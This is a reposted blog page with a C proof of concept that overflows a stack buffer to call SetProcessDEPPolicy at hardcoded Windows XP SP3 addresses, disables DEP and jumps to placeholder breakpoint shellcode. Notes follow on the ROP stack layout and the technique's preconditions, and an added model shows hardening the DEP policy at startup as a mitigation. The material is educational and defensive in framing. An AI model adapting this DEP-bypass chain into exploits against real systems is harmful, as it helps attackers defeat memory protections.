[Repost] DEP bypass with SetProcessDEPPolicy()

    /*
    This is a proof of concept of buffer overflow exploitation with DEP
    bypass on Windows XP Professional SP3 english updated on December 9,
    2009 with DEP manually set to OptOut so enabled for all processes,
    except the ones that are put in the exception list and this program
    is not.

    This source has been compiled with Microsoft Visual C++ 2008 Express
    Edition in Release mode with the default flags. This includes
    /NXCOMPAT and /GS.

    Buffer Security Check (stack cookie, /GS flag) does not need to be
    bypassed because the string buffer, buf, in this example is 4 bytes
    long, so the compiler does not add the GS cookie to the
    useSetProcessDEPPolicy() function. Remember that strict_gs_check
    pragma by default is turned off.

    References:
    * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
      Server 2008' by Michael Howard,
      http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
    * SetProcessDEPPolicy Function,
      http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx

    Feel free to write me for comments and questions,
    Bernardo Damele A. G. <bernardo.damele@gmail.com>
    */


    #include <windows.h>
    #include <stdlib.h>
    #include <string.h>   /* strcpy(), memcpy() */


    void useSetProcessDEPPolicy()
    {
        char buf[4];

        /* Overflow the string buffer and EBP register. */
        strcpy(buf, "AAAABBBB");

        /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
        Windows XP SP3 and Windows Server 2008 and can be abused by an
        attacker while exploiting a buffer overflow vulnerability to disable
        hardware-enforced DEP (NX/XD bit) for the running process.

        Overwrite EIP with the address of SetProcessDEPPolicy() API, which
        is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
        December 9, 2009.

        NOTE: You might need to adapt it depending on your system patch
        level. */
        memcpy(buf+8, "\xa4\x22\x86\x7c", 4);

        /* Return address of SetProcessDEPPolicy().
        Use an address of a JMP ESP instruction in kernel32.dll to jump to our
        shellcode on the top of the stack.

        NOTE: You might need to adapt it depending on your system patch
        level. */
        memcpy(buf+12, "\x13\x44\x87\x7c", 4);

        /* Argument for SetProcessDEPPolicy().
        0x00000000 turns off DEP for this process. */
        memcpy(buf+16, "\x00\x00\x00\x00", 4);

        /* The shellcode to be executed after DEP has been disabled.
        For instance, a breakpoint (INT 3 instruction) to call the
        debug exception handler which will pause the process. */
        memcpy(buf+20, "\xcc", 1);
    }


    int main()
    {
        useSetProcessDEPPolicy();

        return 0;
    }
     
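    Disabling DEP with SetProcessDEPPolicy
    Applies to: Windows XP SP3, Vista SP1 and Windows 2008.
    For this function to work, the current DEP policy must be set to OptIn or OptOut. If the
    policy is set to AlwaysOn (or AlwaysOff), SetProcessDEPPolicy will throw an error. If a module
    is linked with /NXCOMPAT, this technique will not succeed either. Last but not least, it can
    only be called once per process. So if the function has already been called by the current
    process (IE8, for example, calls it when the program starts), it will not succeed.
    Bernardo Damele wrote a blog post about this technique:
    http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html
    The function prototype is:
    BOOL WINAPI SetProcessDEPPolicy(
      __in DWORD dwFlags
    );
    The function takes one argument, which must be set to 0 to disable DEP for the current process.
    To use this function in a ROP chain, the stack needs to be set up like this:
    ● pointer to SetProcessDEPPolicy
    ● pointer to the shellcode
    ● 0
    The pointer to the shellcode ensures that the chain jumps to the shellcode once SetProcessDEPPolicy() has executed.
    On XP SP3 the address of SetProcessDEPPolicy is 7C8622A4 (kernel32.dll).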
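
The conditions listed above are also the mitigation: a process that fixes its own DEP setting at startup leaves a later call with dwFlags = 0 nothing to change. The block below is an added example, not part of the original post or of Bernardo Damele's code; it is a portable C model of those rules rather than Windows code, and `struct proc`, `proc_start`, `model_set_dep` and `dep_survives_disable` are hypothetical names.

```c
#include <stdio.h>

/* Constructed model, not Windows code: the rules are the ones listed above. */
enum sys_policy { ALWAYS_OFF, ALWAYS_ON, OPT_IN, OPT_OUT };
#define DEP_ENABLE 0x1u   /* same value as PROCESS_DEP_ENABLE */

struct proc {
    enum sys_policy policy;  /* system-wide DEP policy */
    int dep_on;              /* DEP currently enforced for this process? */
    int locked;              /* per-process setting already fixed? */
};

/* Assumption: no exception-list entry (OptOut), not opted in (OptIn). */
struct proc proc_start(enum sys_policy policy)
{
    struct proc p = { policy, policy == ALWAYS_ON || policy == OPT_OUT, 0 };
    return p;
}

/* Model of SetProcessDEPPolicy(flags): returns 1 on success, 0 on failure. */
int model_set_dep(struct proc *p, unsigned flags)
{
    if (p->policy == ALWAYS_ON || p->policy == ALWAYS_OFF)
        return 0;             /* only OptIn and OptOut accept the call */
    if (p->locked)
        return 0;             /* callable once per process */
    p->dep_on = (flags & DEP_ENABLE) != 0;
    p->locked = 1;
    return 1;
}

/* Is DEP still enforced after a later call with dwFlags = 0? */
int dep_survives_disable(enum sys_policy policy, int harden_at_startup)
{
    struct proc p = proc_start(policy);
    if (harden_at_startup)
        model_set_dep(&p, DEP_ENABLE);  /* first thing the program does */
    model_set_dep(&p, 0);               /* the call described on this page */
    return p.dep_on;
}

int main(void)
{
    static const char *name[] = { "AlwaysOff", "AlwaysOn", "OptIn", "OptOut" };
    for (int pol = ALWAYS_OFF; pol <= OPT_OUT; pol++)
        printf("%-9s  unhardened: DEP %-3s  hardened: DEP %s\n", name[pol],
               dep_survives_disable((enum sys_policy)pol, 0) ? "on" : "off",
               dep_survives_disable((enum sys_policy)pol, 1) ? "on" : "off");
    return 0;
}
```

In a real 32-bit Win32 program the startup step corresponds to calling SetProcessDEPPolicy(PROCESS_DEP_ENABLE) before any untrusted input is handled.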
posted @ 2012-05-31 21:53  yarpee